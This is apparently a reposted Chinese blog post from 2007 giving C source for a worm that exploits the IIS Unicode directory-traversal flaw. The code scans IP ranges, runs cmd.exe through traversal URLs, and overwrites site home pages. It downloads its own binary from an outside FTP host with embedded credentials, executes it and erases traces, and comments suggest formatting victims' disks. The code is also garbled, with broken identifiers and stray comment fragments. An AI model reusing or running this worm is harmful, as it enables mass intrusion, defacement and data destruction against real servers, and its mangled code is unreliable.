掃描UNICODE漏洞傳播、攻擊的蠕蟲原始碼 (轉)

worldblog發表於2007-12-23

在5.1期間的中美戰中,聯盟的網站中,+IIS+UNICODE主機佔90%。(美國的poizenBOx同樣是利用這個UNICODE漏洞攻擊我國的主機)

詳細請見

下面是我和zhaowuqing寫的一個利用該漏洞的。跟LION蠕蟲有些相象,都需要把自己寄存到某個主機上、、、、、、

執行:直接執行(無引數)將掃描本機IP開始的100個主機,並修改首頁、傳播

帶引數執行 :202.97.233.0 202.97.233.254  這將掃描該IP段的主機並實施攻擊。

下面貼

forget to link with wsock32.lib :-o
#include
#include

//定義常量
int num=0;
int ExeDirNum=0;
HANDLE hSemaphore=NULL;
MaxThread=100;//最大開100個執行緒掃描
//下面定義漏洞陣列
char *hole[]={"%c0%2f..%c0%2f..%c0%2f",
"%c0%af..%c0%af..%c0%af",
"%c1%1c..%c1%1c..%c1%1c",
"%c1%9c..%c1%9c..%c1%9c",
"%c0%2f..%c0%2f..%c0%2f",
"%c0%af",
"%c1%9c",
"%c1%pc",
"%c0%9v",
"%c0%qf",
"%c1%8s",
"%c1%1c",
"%c1%9c",
"%c1%af",
"%e0%80%af",
"%f0%80%80%af",
"%f8%80%80%80%af",
"%fc%80%80%80%80%af",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af","%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c"};

//下面7個漏洞出現的目錄,可以自己定義更多,但務必修改後改下面的for迴圈數字
char *ExeDirs[7]={"scripts","msadc","cgi-bin","_vti_bin","_vti_bin/msadc","scripts/msadc","IISADMPWD"};


long GetLocalIP(void);//獲得本機IP
D WIN FindExeDir(LPVOID lp);//找到可目錄
char *GetData(int SockFD);//獲取SEND返回的資料
char * find(const char*psz,const char * pszKey);//在返回資料中查詢指定字串

 

char *localpath;//system32的路徑
char *exedir;//指令碼路徑
char* Path;//首頁所存放的路徑

//程序入口

int main(int argc, char **argv)
{
 HANDLE hThread=NULL;
 DWORD dwThreadID;
  long Previouunt;
 int i;
 int Star;
 int StopNet;
 int StartHost;//IP段開始
 int StopHost;//IP段結束
 
 WSADATA wsaData;
 struct in_addr host;
 
 Wtartup(0x202, &wsaData );
 if(argc<2)//無引數執行的時候掃描本機IP開始的100個主機
 {
 StartNet=GetLocalIP();
 StopNet=GetLocalIP()+100;
 }
 else//引數iis 202.97.56.3 202.97.56.254這種方式,取引數作為IP段
 {
 StartNet=inet_addr(argv[1]);
 StopNet=inet_addr(argv[2]);
 }
 StartHost=ntohl(StartNet);
 StopHost=ntohl(StopNet);
 WSACleanup();
  do
 {
 
 host.S_un.S_addr =_addr(argv[1]);
 WSAStartup(0x202, &wsaData );
 
 hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);
 if(hSemaphore==NULL)
 {
 
 printf("nCreateSemaphore failed:%d",GetLastError());
 ;
 }
 
 for(i=StartHost;i<=StopHost;i++)
 {
 hThread=CreateThread(NULL,0,FindExeDir,(LPVOID)i,0,&dwThreadID);
 if(hThread==NULL)
 
 {
 printf("nCreate thread failed:%d",GetLastError());
 break;
 }
 printf(".");
 Sleep(10);
 CloseHandle(hThread);
 WaitForSingle(hSemaphore,INFINITE);
 }
 while(1)
 {
 WaitForSingleObject(hSemaphore,INFINITE);
 if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))
 {
 printf("nmain() ReleaseSemaphore failed:%d",GetLastError());
 Sleep(5000);
 break;
 }
 if(PreviousCount==(MaxThread-1))
 {
 printf("nAll done.");
 break;
 }
 Sleep(500);
 }
 
 printf("發現可執行目錄. [%s]n", exedir);
 printf("可執行目錄是 [%s]n",localpath);
 
 
 CloseHandle(hSemaphore);
 
 WSACleanup();
 
 
 }
  while(argc<2);//無引數執行,既在被黑主機上執行,死迴圈
 
 return 0;
}

/*
 * Resolve this machine's own host name and return one of its IPv4 addresses
 * (the last entry of h_addr_list) in the form inet_addr() yields, i.e. in
 * network byte order. Every address found is printed on the way.
 * Returns 0 when gethostbyname() fails.
 */
long GetLocalIP(void)
{
 char  szName[128];
 int i;
 PHOSTENT pHost;
 gethostname(szName, 128);/* return value unchecked; szName is indeterminate on failure */
 printf("%sn",szName);/* "n" presumably was "\n" before transcription */
 pHost = gethostbyname(szName);
 if( NULL == pHost )// failed
 return 0;
 for(i=0;pHost->h_addr_list[i]!=NULL;i++)
 printf("%sn",inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i])));
 /* NOTE(review): when h_addr_list is empty i is still 0 and this reads
  * index -1. The inet_ntoa/inet_addr round trip merely converts the last
  * address back to its 32-bit form; inet_ntoa uses a static buffer, so
  * this is not safe from several threads. */
 return inet_addr(inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i-1])));
}


DWORD WINAPI FindExeDir(LPVOID lp)
{
 int host=(int)lp;
 u_short port=80;
 int SockFD,i;
 struct sockaddr_in DstSAin;
 char waste[500],uniwaste[500];
 char *buffer,*p;
 char space[3];
 char dletter[2];//路徑
 char asc[3];
 int rbytes=0,loc1=0,loc2=0;
 char locdir[300];
 int exenum=0;

 memset(locdir,0,300);
 memset(uniwaste,0,499);
 memset(space,0,3);
 strcpy(space,"%20");
 memset(asc,0,3);
 strcpy(asc,"%3E");
 printf("查詢漏洞%d...n",host);
 
 for(i=0;i<8;i++)
 {
 strcat(uniwaste,"..");
 strcat(uniwaste,hole[num]); unicode碼和URL結合起來.
 }
 
 memset(waste,0,500);
  our string that sees if we can execute cmd.exe
  way we know if a directory is executable and if the exe dir is on the same harddrive as cmd.exe
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sdir HTTP/1.0nn",ExeDirs[exenum],uniwaste,space);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("Trying directory [%s]n", waste);
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"Directory of"); 到了cmd.exe的目錄!!!
 if(p!=NULL)
 {
 
 loc1=p-buffer+1;
 p=strstr(buffer,"

");
 if(p!=NULL)
 {
 loc2=p-buffer+1;
 loc2=loc2-27;
 buffer[loc2-2]='';
 strncpy(locdir,buffer+loc1+12,290);
  executable directory.
 exedir=malloc(strlen(ExeDirs[exenum])+1);
 memset(exedir,0,strlen(ExeDirs[exenum])+1);
 memcpy(exedir,ExeDirs[exenum],strlen(ExeDirs[exenum]));
  executable directory path
 localpath=malloc(strlen(locdir)+1);
 memset(localpath,0,strlen(locdir)+1);
 memcpy(localpath,locdir,strlen(locdir));
 closesocket(SockFD);
 詢首頁位置
 
 memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sset HTTP/1.0nn",ExeDirs[exenum],uniwaste,space);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {

 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 WebPath=find(buffer,"PATH_TRANSLATED=");//上面透過cmd.exe?/c set命令顯示主機
  中找到WEB目錄,用來修改首頁
 closesocket(SockFD);
 strncpy(dletter,localpath,1);
 dletter[1]='';
 printf("首頁路徑%sn",WebPath);
 }
 
  memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀default.>+%sdefault.asp HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
  if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("修改首頁default.asp n");
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"Access is denied");
 if(p!=NULL)
 {
 printf("Access is denied");
 }
 closesocket(SockFD);
 }
  memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀index.asp>+%sindex.asp HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
  if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("修改首頁index.asp n");
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"Access is denied");
 if(p!=NULL)
 {
 printf("不能修改,屬性有問題");
 }
 closesocket(SockFD);
 }
 
 
 memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀index.html>+%sindex.html HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("修改首頁index.html n");
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"Access is denied");
 if(p=NULL)
 {
 printf("不能修改,檔案屬性有問題");
 }
 closesocket(SockFD);
 }
 
 memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀和~~~default.htm>+%sdefault.htm HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("修改首頁default.htm n");
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"Access is denied");
 if(p!=NULL)
 {
 printf("不能修改,檔案屬性有問題");
 }
 closesocket(SockFD);
 }
 接到FTP主機
  memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+open+home4u.china.com>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("連線到FTP主機 n");
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"Access is denied");
 if(p!=NULL)
 {
 printf("system32不允許寫操作");
 }
 closesocket(SockFD);
 }
  登陸 
  memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+111222>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("登陸USER:111222n");
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"Access is denied");
 if(p!=NULL)
 {
 printf("system32不允許寫操作");
 }
 closesocket(SockFD);
 }
 
 碼輸入
 memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+mmipip>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("密碼:mmipn");
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"Access is denied");
 if(p!=NULL)
 {
 printf("system32不允許寫操作");
 }
 closesocket(SockFD);
 }
  FILE
 memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+get+srv.exe>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("srv.exe n");//把自己下載到漏洞主機執行
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"Access is denied");
 if(p!=NULL)
 {
 printf("system32不允許寫操作");
 }
 closesocket(SockFD);
 } 
 
 出ftp主機
 memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+quit>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("退出FTP主機 n");
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"Access is denied");
 if(p!=NULL)
 {
 printf("system32不允許寫操作");
 }
 closesocket(SockFD);
 } 
 
 
 始FTP
 memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%tp+-s:up.txt>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("下載檔案 n");
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"Error");
 if(p!=NULL)
 {
 printf("FTP結束");
 }
 closesocket(SockFD);
 } 
 除del.txt避免在主機上留有FTP資訊
 memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%sdel+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("刪除FTP痕跡 n");
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"access is");
 if(p!=NULL)
 {
 printf("刪除失敗");
 }
 closesocket(SockFD);
 } 
 行
 memset(waste,0,500);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%ssrv.exe HTTP/1.0nn",ExeDirs[exenum],uniwaste);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
 printf("在主機上執行自己 n");
 send(SockFD,waste,strlen(waste),0); one of the directories
 buffer=GetData(SockFD);
 p=strstr(buffer,"CGI Error");
 if(p!=NULL)
 {
 printf("執行成功");//此時存在漏洞的主機開始掃描自己IP段附近的漏洞主機
 }
 closesocket(SockFD);
 } 
 
 
  1;
 }
 
 }
 
 
 if(num<23)//迴圈嘗試漏洞編碼
 { num++; 
 closesocket(SockFD);
 goto crack;
 }
 else
 {
 if(exenum<6)//遍歷各個目錄
 {
 num=0;
 exenum++;
 ExeDirNum=exenum;
 closesocket(SockFD);
 goto crack;
 }
 
 closesocket(SockFD);
 }
 
 
 printf("掃描全部結束,在此應該進行破壞性操作...n");
  選辦法,在目標主機上的autoexec.bat里加上格式化命令
 後執行ExitSystem(1);使主機重新啟動
 新啟動後格式化硬碟
 }
 return 0;
}

//在返回的資料中查詢指定資訊
/*
 * Locate pszKey in pszSource and return the text that follows it, up to the
 * next occurrence of the literal "rn" (on this page the literal reads "rn";
 * presumably "\r\n" with the backslashes lost in transcription — confirm
 * against the original). Returns NULL when pszKey is not present.
 *
 * The result points into one static buffer shared by every caller, so it is
 * overwritten by the next call and races when called from several threads
 * (FindExeDir runs one thread per host and calls this).
 */
char* find(const char*pszSource,const char* pszKey)
{
  static char szBuffer[2049];
  const char * p;
  const char * q;
  p = q = NULL;
  p = strstr(pszSource,pszKey);
  if ( p != NULL )
  {
  p += strlen(pszKey);
  q = strstr(p,"rn");
  if ( q == NULL )
  q = p + strlen(p);
  /* NOTE(review): q-p is not bounded to sizeof szBuffer (2049), and strncpy
   * writes no terminator here because the source is at least q-p bytes
   * long: a shorter match after a longer one leaves stale trailing bytes,
   * and a value over 2048 bytes overflows the buffer. */
  strncpy(szBuffer,p,q-p);
  return szBuffer;
  }
  return NULL;
}


/*
 * Read one chunk of reply from SockFD without blocking: the socket is put
 * into non-blocking mode and recv() is polled up to nine times, 500 ms
 * apart, until it returns data. The chunk is copied into a fresh
 * 2000-byte malloc'ed buffer that the caller owns (the callers on this
 * page never free it, so every call leaks 2000 bytes).
 */
char *GetData(int SockFD)
{
  // data without a blocking recv so we dont hang if we crash the server
 char *buffer;
 char data[2001];
 unsigned long on=1;
 unsigned long off=0;/* unused */
 char waste[2001];
 int p, i=1;
 int t;
 
 memset(data,0,2001);
 p=ioctlsocket(SockFD,FIONBIO,&on);/* result stored in p but never checked */
 memset(waste,0,2001);
 for(t=1;t<10;t++){
 i=recv(SockFD, waste, 2000, 0);
 if(i>0)
 break;
 Sleep(500);
 }
 /* NOTE(review): if every recv() returned SOCKET_ERROR (-1), i is -1 here
  * and this writes one byte before the array. The '' literal is presumably
  * '\0' with the backslash lost in transcription. */
 waste[i]='';
 strncat(data,waste,2000);
 buffer = ( char * )malloc( 2000 * sizeof( char ) );/* NULL result unchecked */
 /* NOTE(review): a full 2000-byte reply leaves buffer with no terminator,
  * since strncpy only pads when the source is shorter than the count. */
 strncpy( buffer, data, 2000 );
 return buffer;
}

 


